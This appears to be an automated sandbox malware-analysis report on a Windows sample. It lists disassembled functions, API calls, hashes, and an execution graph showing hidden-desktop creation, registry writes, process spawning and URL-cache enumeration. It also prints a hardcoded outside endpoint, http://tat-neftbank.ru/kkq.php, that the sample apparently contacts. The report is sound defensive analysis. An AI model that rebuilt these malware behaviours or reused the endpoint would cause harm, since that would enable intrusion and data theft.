                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2707 403840 printf 2708 403880 2707->2708 2709 403884 printf 2708->2709 2710 40386d printf 2708->2710 2710->2708 2716 4052e0 2717 4052ec strcat strcat 2716->2717 2733 40431f 2717->2733 2720 405360 2721 40537c CreateProcessA 2720->2721 2722 4053ac CloseHandle sprintf 2721->2722 2732 405469 2721->2732 2724 405413 2722->2724 2723 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2725 4054d0 2723->2725 2726 4053e5 FindWindowA 2724->2726 2727 40541d 2724->2727 2726->2727 2728 405402 Sleep 2726->2728 2729 405421 Sleep 2727->2729 2727->2732 2728->2724 2730 405434 Sleep 2729->2730 2731 40543e GetWindowTextA 2729->2731 2730->2731 2731->2732 2732->2723 2734 404341 GetCurrentThreadId GetThreadDesktop 2733->2734 2735 404364 CreateDesktopA 2733->2735 2736 40438e SetThreadDesktop 2734->2736 2737 40435f memset 2734->2737 2735->2736 2735->2737 2736->2737 2737->2720 2737->2721 2840 401581 2841 4015c8 2840->2841 2842 4015a2 rand 2841->2842 2843 4015cc 2841->2843 2842->2841 2738 403562 GetModuleFileNameA 2739 403588 2738->2739 3000 402ba3 3002 402a89 3000->3002 3001 402cd2 3002->3001 3003 402cad GetCurrentProcessId 3002->3003 3004 402b2a GetModuleHandleA GetProcAddress 3002->3004 3003->3002 3004->3002 2740 4077e4 2741 407808 2740->2741 2748 40789e 2740->2748 2742 407820 SetFocus 2741->2742 2743 40782b 2741->2743 2741->2748 2742->2743 2744 407833 SetFocus 2743->2744 2745 40783e 2743->2745 2744->2745 2746 407857 2745->2746 2747 40784c SetFocus 2745->2747 2749 40786a 2746->2749 2750 40785f SetFocus 2746->2750 2747->2746 2753 4078fe CallWindowProcA 2748->2753 2755 407910 2748->2755 2751 407872 SetFocus 2749->2751 2752 40787d 2749->2752 2750->2749 2751->2752 2752->2748 2754 407885 SetFocus 2752->2754 2753->2755 2754->2748 2844 405c09 lstrlenA GetTickCount srand 2877 40509b 2844->2877 2849 405f54 2850 405caf ExpandEnvironmentStringsA 2891 40570c 2850->2891 2853 405ceb strcat strcat 2854 40431f 4 API calls 2853->2854 2855 405d14 memset 2854->2855 2856 405d72 CreateProcessA 2855->2856 2857 405d56 2855->2857 2858 405da2 CloseHandle sprintf 2856->2858 2859 405f24 DeleteFileA TerminateProcess CloseHandle 2856->2859 2857->2856 2860 405e09 2858->2860 2859->2849 2861 405e13 2860->2861 2862 405ddb FindWindowA 2860->2862 2861->2859 2863 405e1b Sleep GetWindowTextA 2861->2863 2862->2861 2864 405df8 Sleep 2862->2864 2865 405e50 2863->2865 2864->2860 2865->2859 2930 405613 2865->2930 2867 405e6b 2867->2859 2868 405e76 CopyFileA 2867->2868 2869 403619 5 API calls 2868->2869 2870 405e9c DeleteFileA lstrlenA strncmp 2869->2870 2871 405ec6 lstrlenA 2870->2871 2872 405eef 2870->2872 2938 403743 CreateFileA 2871->2938 2874 403743 4 API calls 2872->2874 2875 405eea LocalFree 2874->2875 2875->2859 2878 4050ea 2877->2878 2879 4050b6 sprintf 2878->2879 2880 4050f8 2878->2880 2941 4041f4 2879->2941 2882 4041f4 4 API calls 2880->2882 2883 40510e 2882->2883 2944 4041c3 lstrlenA 2883->2944 2886 40429c RegOpenKeyExA 2887 4042e0 RegQueryValueExA 2886->2887 2890 4042dc 2886->2890 2888 404304 RegCloseKey 2887->2888 2889 4042f8 RegCloseKey 2887->2889 2888->2890 2889->2890 2890->2849 2890->2850 2892 4079e4 2891->2892 2893 405719 GetTempPathA 2892->2893 2894 405746 2893->2894 2952 4015ea 2894->2952 2897 405798 strcat 2898 4057ac rand 2897->2898 2899 4057e7 rand 2898->2899 2900 4057be rand sprintf 2898->2900 2901 4057f9 strcat 2899->2901 2902 40580d strcat rand 2899->2902 2900->2899 2901->2902 2903 405839 strcat 2902->2903 2904 40584d rand 2902->2904 2903->2904 2905 405888 sprintf rand 2904->2905 2906 40585f rand sprintf 2904->2906 2907 4058c3 strcat 2905->2907 2908 4058d7 strcat rand 2905->2908 2906->2905 2907->2908 2909 405911 strcat rand 2908->2909 2910 4058fd strcat 2908->2910 2911 405966 strcat rand 2909->2911 2912 40593d rand sprintf 2909->2912 2910->2909 2913 4059a0 strcat rand 2911->2913 2914 40598c strcat 2911->2914 2912->2911 2915 4059d2 strcat 2913->2915 2916 4059e6 strcat rand 2913->2916 2914->2913 2915->2916 2917 405a20 sprintf rand 2916->2917 2918 405a0c strcat 2916->2918 2919 405a70 strcat rand 2917->2919 2920 405a5c strcat 2917->2920 2918->2917 2921 405ab0 rand sprintf rand 2919->2921 2922 405a9c strcat 2919->2922 2920->2919 2923 405af3 strcat 2921->2923 2924 405b07 strcat rand 2921->2924 2922->2921 2923->2924 2925 405b39 strcat 2924->2925 2926 405b4d rand 2924->2926 2925->2926 2927 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2926->2927 2928 405b5f rand sprintf 2926->2928 2929 405c04 2927->2929 2928->2927 2929->2849 2929->2853 2931 4079e4 2930->2931 2932 405620 FindFirstUrlCacheEntryA 2931->2932 2933 405663 _stricmp 2932->2933 2936 405685 2932->2936 2934 4056a7 FindNextUrlCacheEntryA 2933->2934 2933->2936 2935 4056c9 _stricmp 2934->2935 2934->2936 2935->2936 2937 4056fb 2935->2937 2936->2867 2937->2934 2939 403775 2938->2939 2940 403779 SetFilePointer WriteFile CloseHandle 2938->2940 2939->2875 2940->2939 2947 40421f RegCreateKeyExA 2941->2947 2945 40421f 4 API calls 2944->2945 2946 4041ee InterlockedIncrement memset 2945->2946 2946->2886 2948 404262 RegSetValueExA 2947->2948 2949 404219 2947->2949 2950 404288 RegCloseKey 2948->2950 2951 40427c RegCloseKey 2948->2951 2949->2878 2950->2949 2951->2949 2953 401634 2952->2953 2954 401638 strcat sprintf rand 2953->2954 2955 40160e rand 2953->2955 2954->2897 2954->2898 2955->2953 3005 4037aa 3007 4037c8 printf printf 3005->3007 3008 40380d 3007->3008 3009 4037fa printf 3008->3009 3011 403812 printf 3008->3011 3009->3008 3012 4035ab 3013 4079e4 3012->3013 3014 4035b8 vsprintf 3013->3014 3017 4035f9 MessageBoxA 3014->3017 3016 4035ea 3017->3016 2756 40686c lstrlenA 2757 405f5b 9 API calls 2756->2757 2758 40689a 2757->2758 2759 4068a1 WinExec 2758->2759 2760 4068a9 2758->2760 2759->2760 2956 40328f 2957 402efd 2956->2957 2958 402cd7 3 API calls 2957->2958 2959 4033ce 2957->2959 2960 4030e5 GetModuleHandleA 2957->2960 2961 40289a 4 API calls 2957->2961 2962 40314c VirtualQuery 2957->2962 2964 402f98 GlobalMemoryStatus 2957->2964 2965 402f6f IsBadReadPtr 2957->2965 2966 403059 CloseHandle 2957->2966 2958->2957 2960->2957 2961->2957 2962->2957 2963 4031b1 IsBadWritePtr 2962->2963 2963->2957 2964->2957 2965->2957 2966->2957 2967 407892 2968 40789e 2967->2968 2969 407910 2968->2969 2970 4078fe CallWindowProcA 2968->2970 2970->2969 3018 405133 10 API calls 3019 40429c 4 API calls 3018->3019 3020 405264 3019->3020 3021 405278 3020->3021 3022 40526b LocalFree 3020->3022 3024 40509b 6 API calls 3021->3024 3023 4054d0 3022->3023 3025 40527d ExpandEnvironmentStringsA 3024->3025 3044 404532 3025->3044 3028 4052d3 LocalFree 3028->3023 3029 4052ec strcat strcat 3030 40431f 4 API calls 3029->3030 3031 405315 memset 3030->3031 3032 405360 3031->3032 3033 40537c CreateProcessA 3031->3033 3032->3033 3034 4053ac CloseHandle sprintf 3033->3034 3043 405469 3033->3043 3036 405413 3034->3036 3035 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3035->3023 3037 4053e5 FindWindowA 3036->3037 3038 40541d 3036->3038 3037->3038 3039 405402 Sleep 3037->3039 3040 405421 Sleep 3038->3040 3038->3043 3039->3036 3041 405434 Sleep 3040->3041 3042 40543e GetWindowTextA 3040->3042 3041->3042 3042->3043 3043->3035 3045 40453f 3044->3045 3046 403619 5 API calls 3045->3046 3047 404570 3046->3047 3048 404579 3047->3048 3049 404596 lstrlenA LocalAlloc GetTempPathA 3047->3049 3050 404589 LocalFree 3047->3050 3048->3028 3048->3029 3051 404604 3049->3051 3050->3048 3051->3051 3052 4015ea rand 3051->3052 3053 40461d strcat sprintf rand 3052->3053 3054 404655 strcat 3053->3054 3055 404668 rand 3053->3055 3054->3055 3056 40467a rand sprintf 3055->3056 3057 40469d rand 3055->3057 3056->3057 3058 4046bb strcat 3057->3058 3059 4046ce strcat rand 3057->3059 3058->3059 3060 4046f3 strcat 3059->3060 3061 404706 rand 3059->3061 3060->3061 3062 404741 sprintf rand 3061->3062 3063 40471e rand sprintf 3061->3063 3064 404770 strcat 3062->3064 3065 404783 strcat rand 3062->3065 3063->3062 3064->3065 3066 4047a8 strcat 3065->3066 3067 4047bb strcat rand 3065->3067 3066->3067 3068 4047e6 rand sprintf 3067->3068 3069 404809 rand sprintf sprintf rand 3067->3069 3068->3069 3070 404859 rand sprintf 3069->3070 3071 40487c rand 3069->3071 3070->3071 3072 404894 strcat 3071->3072 